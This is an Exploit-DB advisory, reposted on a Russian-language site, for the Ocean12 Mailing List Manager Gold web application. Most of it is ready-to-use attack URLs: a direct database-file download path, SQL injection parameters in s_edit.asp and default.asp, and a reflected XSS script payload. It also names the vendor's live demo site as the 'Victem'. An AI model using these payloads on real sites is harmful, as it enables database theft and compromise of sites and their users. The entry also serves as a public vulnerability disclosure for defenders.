- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7319
- Проверка EDB
-
- Пройдено
- Автор
- POUYA_SERVER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5980 cve-2008-5979 cve-2008-5978
- Дата публикации
- 2008-12-02
Код:
#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Mailing List Manager Gold
Vendor : http://ocean12tech.com/products/o12mailgold
Author : Pouya_Server , [email protected]
Vulnerability : (DD,SQL,XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/o12mail.mdb
[SQL]:
http://site.com/[Path]/s_edit.asp?email=[SQL]
http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
[XSS]:
http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&[email protected]"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://ocean12tech.com/products/o12mailgold/demo
# milw0rm.com [2008-12-02]- Источник
- www.exploit-db.com
